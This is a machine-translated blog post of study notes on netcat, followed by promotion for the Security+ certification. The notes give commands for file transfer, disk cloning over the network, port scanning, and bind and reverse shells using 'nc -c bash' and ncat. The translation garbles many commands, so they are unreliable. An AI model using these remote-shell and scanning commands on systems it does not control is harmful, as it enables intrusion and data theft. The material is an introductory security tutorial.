"Safe Cow Study Notes" common tool-netcat

Source: Internet
Author: User
Tags base64 mcrypt

I. Functions of the NETCAT

The Swiss Army knife in the 1.NETCAT--NC cross-platform Network tool is exceptionally compact

(1) Listening mode/transmission mode

1. Connecting Mailboxes

Ping pop.sina.com Find the IP of Sina mailbox

NC-VN IP 110

Login after connecting to the mailbox

Pop default requires base64:

Open shell

Input base64

Input character

Enter Ctrl+d to get the characters after transcoding

SMTP mailbox does not require transcoding to 64

2. Connecting Metasploit

NC-NV (Metasploit) IP 80

Send HTTP request for Web page information

(2) telnet/get banner Information

(3) Transfer of text information

The two Kali are connected to one another.

A:NC-L-P Port open and listen Port port A as a server

B:NC-NV IP Port B as a client

Can be used as a remote electronic forensics

Modify the contents of the server as little as possible

Ls-l | NC-NV IP Port

Nc-l-P port > ps.txt outputs the remotely transmitted information to the Ps.txt.

PS aux | NC-NV IP port-q 1 command-q 1 wait for 1s to exit

(4) Transferring files/directories

Transfer files:

A:nc-lp Port>1.mp4 Receiving End

B:NC-NV IP Port <1.mp4-q 1 send side

Or

A:NC-LP Port < 1.mp4-q 1 Send end

B:NC-NV IP Port > 2.mp4 receiving End

File suffix is consistent

Transfer directory:

a:tar-cvf-music/| NC-LP Port-q 1

B:NC-NV IP Port | TAR-XVF-

Idea: Package a directory and then unpack it

(5) Encrypt transfer files

A:nc-lp Port | MCrypt --flush-fbqd-a rijndael-256-m

ECB > 1.mp4 receiving end

B:mcrypt--flush-fbq-a rijndael-256-m ECB < A.mp4 |

NC-NV IP port-q 1 Send side

Idea: Use the encryption function of the operating system to install MCrypt

(6) Remote control Trojan

(7) Encrypt all traffic

(8) Streaming media server

A:cat 1.mp4 | NC-LP Port

B:NC-NV IP Port | MPLAYER-VO X11-cache 3000-

Idea: Transfer video streams and play using MPlayer player

MPlayer need to install it yourself

(9) Remote clone hard Drive

A:NC-LP Port | DD OF=/DEV/SDA

B:DD IF=/DEV/SDA | NC IP port-q 1

(10) Port scan

Nc-nvz IP 1-65535

Scan all open ports

Use TCP port by default

Nc-nvzu IP 1-1024

Scan UDP ports

The scanning results of each scanner cannot be completely correct.

(11) Remote control (-C bash is the controlled party)

Forward direction:

A:NC-LP 333-c Bash

B:NC-NV IP Port

Reverse:

A:NC-LP Port

B:NC-NV IP port-c Bash

Note: Windows users change bash to cmd

Can be used as a system service, writing viruses, remote control

Two. Defects of Netcat

1.NC lack of encryption and authentication capabilities

The use of clear text transmission

2. Each version of the NC parameters are different

Three. Ncat Introduction

1.Ncat compensates for netcat defects

2.Ncat Included in Nmap Toolkit

3. Remote CONTROL

A:NCAT-C bash--allow ip-vnl Port--ssl is controlled

B:NCT-NV IP Port--ssl

Exchange the key first and then use SSL encryption for the session

This note is for safe Cattle class student notes, want to see this course or information security of dry goods can go to safe cattle classes


security+ Certification Why is the Internet + era of the most popular certification?

Manifesto first introduce you to security+


security+ certification is a neutral third-party certification, the issuing agency for the United States Computer Industry Association CompTIA, and CISSP, ITIL and other common inclusion of the international IT Industry 10 Popular certification, and CISSP emphasis on information security management, compared to security+ Authentication is more emphasis on information security technology and operations.

This certification demonstrates your ability to network security, compliance and operational security, threats and vulnerabilities, application, data and Host security, access control and identity management, and encryption technology. Because of its difficult examination difficulty, the gold content is high, has been widely adopted by global enterprises and security professionals.

Why is security+ certification so hot?

        Reason one: In all information security certification, the emphasis on information security technology certification is blank,  security+ certification can make up for the gap in the field of information security technology.

      currently recognized in the industry of information security certification mainly Cisp and CISSP, but whether cisp or CISSP are emphasis on information security management, technical knowledge is broad and simple, the exam is around. And CISSP require a certificate of information security work experience for more than 5 years, Cisp also require a college education 4 years of working experience, these requirements will undoubtedly be able and motivated young people of the road blocked. In the real world, whether it is looking for a job or a raise, or a tender time to report personnel, certification is essential, which brings a lot of injustice to young people. The emergence of security+ can clear these young people career development obstacles, because security+ emphasis on information security technology, so there is no special requirements for work experience. As long as you have an IT-related background, the pursuit of progress can be studied and tested.

        reason two:  it operation and maintenance personnel work and turn over the weapon.

        in the banking, securities, insurance, information and communications industries, IT operations personnel are very many, it operations involved in the face is also very wide. is a network, system, security, application architecture, storage as one integrated technology post. Although no program ape "born as a Bachelor, Die also write code," The solemn and tragic, but also has "Hoe wo Day Copse, as the operation of suffering" feeling. Every day to the computer and machine, the time has been inevitable for career development confusion and confusion. The advent of security+ international certification allows the pursuit of IT operations personnel to learn network security knowledge, to master network security practices. Career development in the direction of network security, to solve the problem of the shortage of information security personnel in China. In addition, even if not transformation, to do a good job in operation and maintenance, learning safety knowledge to obtain safety certification is also essential.

Reason three: grounding gas, international stylish, easy to test, moderate cost!

As the most influential global leader in the global ICT sector, CompTIA is professional, fair and impartial in the field of information security talent certification. Security+ certification is highly operational and closely related to the daily work of frontline engineers. Suitable for banks, securities, insurance, internet companies and other IT-related personnel learning. As an international certification in 147 countries around the world are widely recognized.

Under the current tide of information security, talent is the key to the development of information security. and the current domestic information security personnel is very scarce, I believe security+ certification will become the most popular information security certification.

This article is from the "11662938" blog, please be sure to keep this source http://11672938.blog.51cto.com/11662938/1980479

"Safe Cow Study Notes" common tool-netcat

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.